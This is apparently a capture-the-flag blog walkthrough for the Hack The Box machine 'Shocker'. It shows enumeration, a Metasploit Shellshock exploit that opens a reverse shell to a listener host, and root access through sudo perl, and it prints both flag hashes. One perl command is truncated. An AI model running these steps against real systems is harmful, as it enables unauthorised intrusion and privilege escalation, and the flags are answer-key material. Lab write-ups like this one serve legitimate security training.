top of page

Shocker


As usual let's start with nmap:

nmap -sV -sC -p- 10.10.10.56

Port 80 is open so let's check the website:






Let's do a gobuster to check if we have any hidden directories:

gobuster dir - u http://10.10.10.56 -w /opy/useful/SecLists/Discovery/Web-Content/common.txt

We found a directory called /cgi-bin so let's do more gobuster on this directory:

gobuster dir -u 10.10.10.56/cgi-bin -w /opt/useful/SecLists/Discovery/Web-Content/big.txt -x php,html,txt,zip,cgi,sh,pl,py

We found 10.10.10.56/cgi-bin/user.sh

Let's check it out:

Let's save this file and check it out:

The name of the machine is Shocker, this reminds us of the Apache Shellshock.

Let's check if there is an exploit in Metasploit:

msfconsole
search shellshock

Let's try exploit/multi/http/apache_mod_cgi_bash_env_exec

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options

set RHOSTS 10.10.10.56

set LHOST 10.10.14.3

set TARGETURI /cgi-bin/user.sh

exploit

Great! It worked!

getuid

sysinfo

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..
cd ..
cd ..
ls

cd home
ls
cd shelly
ls

cat user.txt

2ec24e11320026d1e70ff3e16695b233

Congratulations! You got the user flag!



Privilege Escalation


Let's try the usual command for privilege escalation:

sudo -l

User shelly may run the following commands on Shocker:

/usr/bin/perl


Let's try to execute this command then:

sudo /usr/bin/perl -e 'exec "/bin/s

We get a shell!

whoami

Nice! We have successfully escalated our privileges to root!


Let's now upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..
cd ..
ls

cd root
ls
cat root.txt

52c2715605d70c7619030560dc1ca467


Congratulations! You got the root flag!


190 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page